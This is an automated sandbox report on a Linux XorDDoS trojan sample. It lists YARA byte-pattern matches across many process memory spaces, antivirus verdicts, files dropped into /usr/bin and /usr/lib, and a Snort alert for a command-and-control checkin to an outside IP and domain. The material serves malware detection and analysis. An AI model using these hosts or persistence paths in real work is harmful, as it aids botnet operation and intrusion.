6237.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
Process Memory Space: fuck.elf PID: 6235	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6235	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8c9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x9a6:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6237	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6237	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1583:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1660:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6238	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6238	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8c9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x9a6:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6239	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6239	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8c9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x9a6:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6270	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6270	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x114c:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1229:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6273	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6273	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x979:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xa56:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6275	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6275	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8c9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x9a6:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6278	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6278	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x2de2:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x2ebf:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6281	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6281	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xc98:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xd75:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6288	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6288	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3652:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x372f:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6291	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6291	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xbe8:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xcc5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6294	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6294	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8c9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x9a6:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6296	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6296	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3661:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x373e:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6298	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6298	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3652:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x372f:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6305	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6305	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3652:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x372f:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6308	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6308	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3659:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x3736:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6310	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6310	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3652:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x372f:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6313	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6313	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x2e92:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x2f6f:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6316	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6316	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x2de2:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x2ebf:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6322	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6322	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1091:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x116e:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6325	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6325	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3652:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x372f:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6327	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6327	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1139:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1216:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6330	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6330	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8c9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x9a6:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6332	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6332	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3658:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x3735:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6339	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6339	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3652:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x372f:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6342	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6342	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xc98:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xd75:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6344	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6344	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x2de2:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x2ebf:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6347	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6347	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xc98:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xd75:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6350	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6350	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3289:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x3366:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6358	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6358	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x2de2:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x2ebf:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6361	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6361	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1089:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1166:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6364	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6364	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x35b3:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x3690:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6367	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6367	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8c9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x9a6:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6369	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6369	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8c9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x9a6:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6376	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6376	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3658:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x3735:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6379	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6379	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x2de2:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x2ebf:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6382	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6382	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3665:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x3742:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6385	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6385	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3101:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x31de:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6387	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6387	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x31b1:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x328e:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6395	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6395	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xd6a:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xe47:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6398	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6398	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8c9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x9a6:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6401	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6401	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3652:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x372f:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6404	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6404	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8c9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x9a6:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6406	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6406	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1140:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x121d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6412	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6412	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8c9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x9a6:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6415	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6415	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x2e92:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x2f6f:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6418	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6418	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x31b1:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x328e:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6421	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6421	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x979:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xa56:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6423	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6423	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3658:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x3735:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6429	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6429	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xc98:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xd75:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6432	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6432	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1139:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1216:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6435	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6435	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3101:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x31de:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6438	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6438	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xbe8:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xcc5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6441	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6441	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x2de2:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x2ebf:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6448	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6448	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xc98:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xd75:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6451	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6451	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1140:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x121d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6454	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6454	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3652:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x372f:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6457	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6457	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3652:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x372f:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6459	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6459	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8c9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x9a6:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6466	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6466	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xc98:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xd75:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6469	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6469	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3291:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x336e:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6472	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6472	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x2de2:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x2ebf:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6475	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6475	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1089:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1166:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6477	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6477	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8c9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x9a6:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6483	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6483	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3658:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x3735:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6486	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6486	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1139:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1216:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6488	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6488	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xbe8:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xcc5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: fuck.elf PID: 6491	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: fuck.elf PID: 6491	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xd70:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xe4d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Click to see the 740 entries

Snort Signatures

ET TROJAN DDoS.XOR Checkin - Source IP: 192.168.2.23 - Destination IP: 54.36.15.96

Timestamp:	192.168.2.2354.36.15.963673860032020381 09/21/22-23:39:24.140641
SID:	2020381
Source Port:	36738
Destination Port:	6003
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: fuck.elf

Avira: detected

Multi AV Scanner detection for submitted file

Source: fuck.elf	ReversingLabs: Detection: 80%
Source: fuck.elf	Virustotal: Detection: 66%	Perma Link
Source: fuck.elf	Metadefender: Detection: 65%	Perma Link

Antivirus detection for dropped file

Source: /usr/bin/ujuhiugmmi	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/zkleyiegjf	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/hwcijqdbza	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/axppigwavk	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/jflhtagbsg	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/xocmdvejxu	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/sanzuhhixf	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/xodlvzjoas	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/lib/libudev.so	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/ggsxjmacxa	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/wjnxqdxblo	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/zfyjfaoiow	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/pzvxnaaphf	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/oklqvchkds	Avira: detection malicious, Label: LINUX/Xorddos.cona

Machine Learning detection for dropped file

Source: /usr/bin/ujuhiugmmi	Joe Sandbox ML: detected
Source: /usr/bin/zkleyiegjf	Joe Sandbox ML: detected
Source: /usr/bin/hwcijqdbza	Joe Sandbox ML: detected
Source: /usr/bin/axppigwavk	Joe Sandbox ML: detected
Source: /usr/bin/jflhtagbsg	Joe Sandbox ML: detected
Source: /usr/bin/xocmdvejxu	Joe Sandbox ML: detected
Source: /usr/bin/sanzuhhixf	Joe Sandbox ML: detected
Source: /usr/bin/xodlvzjoas	Joe Sandbox ML: detected
Source: /usr/lib/libudev.so	Joe Sandbox ML: detected
Source: /usr/bin/ggsxjmacxa	Joe Sandbox ML: detected
Source: /usr/bin/wjnxqdxblo	Joe Sandbox ML: detected
Source: /usr/bin/zfyjfaoiow	Joe Sandbox ML: detected
Source: /usr/bin/pzvxnaaphf	Joe Sandbox ML: detected
Source: /usr/bin/oklqvchkds	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: fuck.elf

Joe Sandbox ML: detected

Source: fuck.elf

Malware Configuration Extractor: XorDDoS {"C2 list": []}

Source: /tmp/fuck.elf (PID: 6236)

Reads CPU info from proc file: /proc/cpuinfo

Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2020381 ET TROJAN DDoS.XOR Checkin 192.168.2.23:36738 -> 54.36.15.96:6003

Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443

Source: global traffic

TCP traffic: 192.168.2.23:36738 -> 54.36.15.96:6003

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43

Source: fuck.elf, ujuhiugmmi.11.dr, zkleyiegjf.11.dr, hwcijqdbza.11.dr, axppigwavk.11.dr, jflhtagbsg.11.dr, xocmdvejxu.11.dr, sanzuhhixf.11.dr, xodlvzjoas.11.dr, libudev.so.11.dr, ggsxjmacxa.11.dr, wjnxqdxblo.11.dr, zfyjfaoiow.11.dr, pzvxnaaphf.11.dr, oklqvchkds.11.dr

String found in binary or memory: http://www.gnu.org/software/libc/bugs.html

Source: unknown

DNS traffic detected: queries for: gatat456.com

DDoS

Yara detected XorDDoS Bot

